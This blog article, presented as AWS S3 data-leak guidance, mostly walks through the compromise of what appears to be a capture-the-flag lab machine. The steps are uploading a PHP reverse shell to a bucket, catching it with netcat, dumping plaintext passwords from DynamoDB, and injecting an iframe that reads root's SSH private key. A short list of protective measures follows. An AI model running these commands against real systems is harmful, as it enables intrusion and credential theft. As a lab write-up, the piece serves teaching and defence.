Follow us

Amazon AWS anti-data-leak guidance 2021

Protection measures and an S3 bucket hacking demonstration on a vulnerable machine

Updated: November 17, 2021 By Dmytro Cherkashyn

Title image for Anti-data-leak guidance 2021. How to protect your resource from being hacked through the Amazon S3 service?

Image source ─ pixabay.com

The AWS S3 cloud service now has 100 trillion objects in its storage, and Amazon claims that the objects stored there have 99.99999999% durability. Huge companies like Netflix, Twitch, and BBC use Amazon S3 Services to store their data on the cloud.

In this article, we will:

  • analyse vulnerabilities regarding the S3 buckets
  • show in detail how can hack a machine running AWS services
  • list some protection measures recommended by Amazon and us to keep your data safe on the cloud.

Disclaimer: The attack replicated in this article was performed on a machine in a safe environment, made especially for this. Please do not attack anyone without their written consent.

Amazon S3 Bucket Vulnerability

I will show you how I have replicated an attack by using the file upload feature of Amazon S3.

I first installed the AWS CLI (Command Line Interface) on my Kali Linux machine with the command:

sudo apt install awscli

We install the AWS CLI using the command sudo apt install awscli

I then attempted to connect to a custom endpoint and list the files in the server:

aws –endpoint-url http://s3.bucket.htb s3 ls

We connect to an endpoint, but we first have to configure credentials

However, credentials need to be configured to connect. They can be set with the following command:

aws configure

When prompted, if you leave every field blank, it does not work. But we can use invalid keys (and input any data), and it will still work.

We issue the previous command, and it works; we are connected to the endpoint.

We can now connect to the endpoint

Now we will use the file upload feature of Amazon AWS by uploading a reverse shell that connects back to us.

A reverse shell is a command or a collection of commands that establish a connection from a remote machine to our machine. We are making the target machine connect to us by injecting a file that executes these commands.

Using Kali Linux, such reverse shells are already on your machine, in the directory /usr/share/laudanum/php. If you are on a different Linux flavor, you can download the reverse shell from PentestMonkey.

However, when using this file, you must change your IP and your port. You can find your IP by using ifconfig. I used port 443. You can see comments next to the parameters that you have to change (or you can use CTRL+F to find them fast).

We change the reverse shell with our IP and port

We then upload the file on the server by using the cp (copy) command.

aws –endpoint-url http://s3.bucket.htb s3 cp reverse_shell.php s3://adserver/rev.php

We upload the reverse shell under the name rev.php

You should get a prompt back with the upload location.

We set up the Netcat listener. The machine will connect to us on port 443, so we must use Netcat to receive the connection.

sudo nc -nlvp 443 

We turn on a netcat listener on port 443

We now browse the website to execute our shell. To find our injected file, we type the website’s URL and then a ‘/’ and the file name. We uploaded it under the name shell.php.

We visit the website at /shell.php to execute our injected commands

After we browse it, we check in the terminal and see that we have a shell.

Gained low privileged shell as www-data

We can now type commands on the machine hosting the server.

We are a low privilege user, which is www-data. However, this does not mean that the vulnerability cannot have a huge impact. There are many ways in which we can escalate our privileges.

Before continuing with this shell, I will show you some other commands you can perform on the AWS server that exposes a significant vulnerability.

Amazon uses DynamoDB. We can use this information to find more about the database. Using the following command, we can find the name of tables in the database.

aws --endpoint-url=http://s3.bucket.htb dynamodb describe-table --table-name use

We find the name of the table ‘users

We see that the database contains the table “users”. Enumerating further, we find the users and the clear-text passwords.

aws --endpoint-url=http://s3.bucket.htb dynamodb scan --table-name users

We read the credentials from the table ‘users

Going back to our initial shell, we need to find the users of the machine. They don't need to be identical to the ones in the database (however, password re-usage can happen, so the found credentials can still be valid).

ls -la /home

We list the directories from home to find all the users

We see the user roy. To have a more stable shell and show you how to use SSH on the machine, we will connect with SSH to try all the passwords in the database. The last one works, and we are connected as roy on the machine!

We SSH as roy and test the obtained credentials

Now, to gain full control of the system, we use the AWS server one more time.

We create the table alerts:

aws dynamodb create-table \ --table-name alerts \ --attribute-definitions \ AttributeName=title,AttributeType=S \ AttributeName=data,AttributeType=S \ --key-schema \ AttributeName=title,KeyType=HASH \ AttributeName=data,KeyType=RANGE \ --provisioned-throughput \ ReadCapacityUnits=10,WriteCapacityUnits=5 \ --endpoint-url http://s3.bucket.htb

And add a record:

aws dynamodb put-item \ --table-name alerts \ --item '{ "title": {"S": "Ransomware"}, "data": {"S": "<html><head></head><body><iframe src='/root/.ssh/id_rsa'></iframe></body></html>"} }' \ --return-consumed-capacity TOTAL \ --endpoint-url http://s3.bucket.htb

That will retrieve the root’s SSH key from the directory /root/.ssh.

curl -X POST -d "action=get_alerts" http://127.0.0.1:8000

And then we use curl to download the root’s key and listen on port 8000.

curl http://127.0.0.1:8000/files/result.pdf -o ./result.pdf

We open the result.pdf and find the RSA key.

We move the key in a file called id RSA and set appropriate permissions for the file to connect with SSH.

chmod 400 id_rsa
ssh [email protected] -i id_rsa

We change the permissions on the root’s key and successfully SSH into it, gaining full access to the machine

And we have gained full access to the machine, using Amazon AWS S3 bucket vulnerabilities.

What is Amazon S3?

Amazon Simple Storage Service, or Amazon S3, is a service offered by Amazon Web Services (AWS) built to offer object storage on the Cloud. Amazon promises:

  • scalability
  • data availability
  • security
  • performance

A Bucket is a resource available on an AWS S3 server. It is a container, like a folder, that stores objects (which are defined by files and their metadata).

According to a trusted source, AWS’s top users include huge companies like Netflix, Twitch, LinkedIn, Facebook, BBC, Adobe, Twitter, etc.

Top 10 AWS users

Protection measures

To protect your AWS S3 bucket and disallow intruders’ access to your storage space, you can use the following features provided by Amazon:

  • Block public access
  • Use Bucket ACLs (Access Control Lists) to restrict read, write, access permissions from ‘Everyone’
  • Scan your Amazon S3 buckets with the ListBuckets API
  • Implement policies that do not allow everyone to access and perform actions on the bucket (note: the wildcard “*” means everyone)
  • Encrypt your data. Amazon supports HTTPS, which encrypts data in transit.

Infographic

I have prepared an infographic where you can see statistics about the Amazon S3 cloud storage platform. Please read the protection measures carefully and apply them to keep your private data safe!

Infographic about Amazon AWS S3 cloud storage

Feel free to share the code of infographics

<iframe width="574" height="2597" frameborder="0" scrolling="no" style="overflow-y:hidden;" src="/sites/default/files/pictures/research/amazon-aws-anti-data-leak-guidance-2021/amazon-aws-anti-data-leak-guidance-2021-15.jpg"></iframe>

Conclusion

Considering the demonstration shown in this article, you should take great care of your cloud storage and take all the security measures that Amazon & I recommend.

It's important because today, I demonstrated how the machine hosting the AWS server could be compromised, and the damage can go further to your or your company’s storage.

If you use the Amazon AWS S3 services, please let me know if you have heard of any other vulnerabilities and what protection measures you take to keep your private data safe?

Stay tuned and watch around!

Editor-in-Chief
Dmytro Cherkashyn
Being a passionate security expert from Ukraine, Dmytro has passed through various security domains for the last 12 years, starting with the physical security of nuclear facilities and coming to operational technology cybersecurity for critical infrastructure in Germany.

Leave a comment

click to select